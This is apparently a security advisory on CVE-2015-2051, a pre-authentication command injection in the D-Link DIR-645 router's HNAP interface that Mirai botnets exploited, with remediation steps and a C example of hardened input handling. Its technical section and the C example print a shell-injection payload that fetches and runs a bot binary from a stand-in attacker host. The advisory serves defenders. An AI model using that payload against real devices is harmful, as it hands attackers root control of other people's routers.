CVE-2015-2051 — D-Link DIR-645 Router Remote Code Execution Vulnerability

D-Link DIR-645 — HNAP Interface Command Injection via GetDeviceSettings Enables Pre-Auth RCE as Root; EOL Device; Mirai Botnet Exploitation

The D-Link DIR-645 is a consumer/SOHO wireless router that was widely deployed in homes and small businesses. Like most consumer routers, it runs embedded Linux firmware with a web management interface and exposes a variety of administrative protocols — including HNAP (Home Network Administration Protocol), a SOAP-based management protocol developed by Cisco/Linksys and later adopted by other router vendors.

HNAP is designed to allow centralized management of home network devices and runs on the same HTTP port as the router's web management interface. It processes SOAP XML requests for administrative actions — including device status queries, configuration changes, and diagnostic operations.

Overview

Actively Exploited. This vulnerability was added to CISA's Known Exploited Vulnerabilities (KEV) Catalog on February 10, 2022. Federal agencies are required to apply mitigations per BOD 22-01.

CVE-2015-2051 is a remote code execution vulnerability in the D-Link DIR-645 router's HNAP (Home Network Administration Protocol) interface. A GetDeviceSettings action request passes user-supplied input directly to a system shell command without sanitization, enabling unauthenticated remote attackers to execute arbitrary commands as root. The D-Link DIR-645 is end-of-life with no vendor patch available. The vulnerability has been actively exploited by Mirai and successor IoT botnets since 2016 to enlist consumer routers into DDoS infrastructure.

Affected Versions

| Product | Status |
|---|---|
| D-Link DIR-645 (all firmware versions) | Vulnerable — EOL |

No firmware patch was released. The device is end-of-life and should be replaced.

Technical Details

Root Cause: HNAP Command Injection via GetDeviceSettings

The D-Link DIR-645's HNAP interface handles SOAP requests including GetDeviceSettings. The handler for this action extracts a parameter from the SOAP XML request and passes it unsanitized to a system shell command — constructing something equivalent to:

system("cmd " + user_input)

An attacker can inject shell metacharacters (;, |, `, $()) to append arbitrary commands:

; wget http://attacker.com/bot.mips -O /tmp/bot; chmod +x /tmp/bot; /tmp/bot

The result executes as root — the standard privilege level for embedded router firmware processes — giving the attacker full control of the device.
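An added example (not code from the advisory or from D-Link firmware) that contrasts the string-building pattern above with a hardened handler in C. The function names, the allow-list policy and the use of /bin/echo as a stand-in helper binary are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Injection string quoted from the advisory text; used only as test input. */
static const char PAYLOAD[] =
    "; wget http://attacker.com/bot.mips -O /tmp/bot; chmod +x /tmp/bot; /tmp/bot";

/* Vulnerable pattern: request data spliced into a shell command line. The string
   is only built and inspected here; returns 1 if a metacharacter reaches it. */
int shell_string_has_metachar(const char *user_input) {
    char cmd[512];
    snprintf(cmd, sizeof cmd, "cmd %s", user_input);
    return strpbrk(cmd, ";|`$") != NULL;
}

/* Allow-list (assumed policy): 1..32 chars of [A-Za-z0-9_.-], no leading '-'. */
int is_safe_token(const char *s) {
    size_t len = strlen(s);
    if (len == 0 || len > 32 || s[0] == '-') return 0;
    for (size_t i = 0; i < len; i++)
        if (!isalnum((unsigned char)s[i]) && !strchr("_.-", s[i])) return 0;
    return 1;
}

/* Hardened: validate first, then exec a fixed binary with an argv array so
   no shell ever parses the value. Returns the helper's exit status,
   -1 if the input was rejected, -2 on fork/wait failure. */
int run_helper(const char *helper, const char *user_input) {
    if (!is_safe_token(user_input)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -2;
    if (pid == 0) {
        char *const argv[] = { (char *)helper, (char *)user_input, NULL };
        execv(helper, argv);
        _exit(127); /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -2;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -2;
}

int main(void) {
    printf("vulnerable string carries metachar: %d\n", shell_string_has_metachar(PAYLOAD));
    printf("hardened path on payload: %d\n", run_helper("/bin/echo", PAYLOAD));
    printf("hardened path on wan0: %d\n", run_helper("/bin/echo", "wan0"));
}
```

The two defenses are independent: the allow-list rejects the value before any process is spawned, and the argv-based exec means that even a value that slipped through validation would reach the helper as a single literal argument instead of being parsed by a shell.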

Pre-Authentication Access

The HNAP interface in the DIR-645 is accessible without authentication for certain action types, including the vulnerable action. No username or password is required to send the malicious SOAP request, making this a pre-authentication RCE accessible to any network attacker who can reach the router's management port.

Attack Characteristics

| Attribute | Detail |
|---|---|
| Attack Vector | Network — HTTP SOAP request to HNAP interface |
| Authentication | None required |
| Execution Context | root on embedded Linux |
| Protocol | HNAP (SOAP over HTTP) |
| Exploit | Public (Exploit-DB 33863) |

Discovery

Publicly disclosed in early 2015 with a working exploit published to Exploit-DB. The DIR-645 had already been end-of-life for some time at the point of disclosure, and no firmware fix was provided.

Exploitation Context

  • Mirai botnet: CVE-2015-2051 is one of a collection of D-Link and consumer router vulnerabilities exploited by Mirai (first observed October 2016) and its numerous variants (Satori, Gafgyt, Mozi, Hajime); the October 2016 Dyn DNS DDoS attack — which took down Twitter, Reddit, Netflix, and other major sites — involved Mirai-infected routers
  • Automated internet scanning: Mirai and successor botnets continuously scan the internet for devices with known vulnerabilities including CVE-2015-2051; an unpatched DIR-645 with remote management enabled is likely to be compromised within hours of internet exposure
  • Massive installed base: Millions of DIR-645 units were sold; many remain in service in homes and small businesses years after end-of-life, creating a persistent population of vulnerable internet-facing routers
  • CISA KEV (2022): Added February 2022

Remediation

CISA BOD 22-01 Deadline: August 10, 2022. The impacted product is end-of-life and should be disconnected if still in use.
  1. Replace the device — the D-Link DIR-645 is end-of-life with no available firmware fix. Replace with a currently supported router from a vendor with an active security response program.

  2. Disable remote management — if immediate replacement is not possible, disable remote management (WAN-side web interface access) in the router settings to limit exposure to LAN attackers only.

  3. Firewall the management interface — block inbound access to TCP 80/443 from the WAN side using an upstream firewall or ISP ACLs.

  4. Check for compromise — if the device has been internet-accessible, it may already be enrolled in a botnet. Perform a factory reset and then immediately restrict management access before reconnecting.

  5. Network isolation — isolate any remaining D-Link DIR-645 devices on a separate network segment from sensitive systems to limit the impact of compromise.

Key Details

| Property | Value |
|---|---|
| CVE ID | CVE-2015-2051 |
| Vendor / Product | D-Link — DIR-645 Router |
| NVD Published | 2015-02-23 |
| NVD Last Modified | 2025-10-22 |
| CVSS 3.1 Score | 9.8 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-77 — Improper Neutralization of Special Elements used in a Command ('Command Injection') |
| CISA KEV Added | 2022-02-10 |
| CISA KEV Deadline | 2022-08-10 |
| Known Ransomware Use | No |

CVSS 3.1 Breakdown

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Required Action

CISA BOD 22-01 Deadline: 2022-08-10. The impacted product is end-of-life and should be disconnected if still in use.

Timeline

| Date | Event |
|---|---|
| 2015-02-23 | CVE-2015-2051 published; D-Link DIR-645 HNAP command injection publicly disclosed |
| 2016-10-21 | Mirai botnet DDoS attack on Dyn DNS; Mirai actively exploits D-Link router vulnerabilities including CVE-2015-2051 |
| 2022-02-10 | Added to CISA Known Exploited Vulnerabilities catalog |
| 2022-08-10 | CISA BOD 22-01 remediation deadline |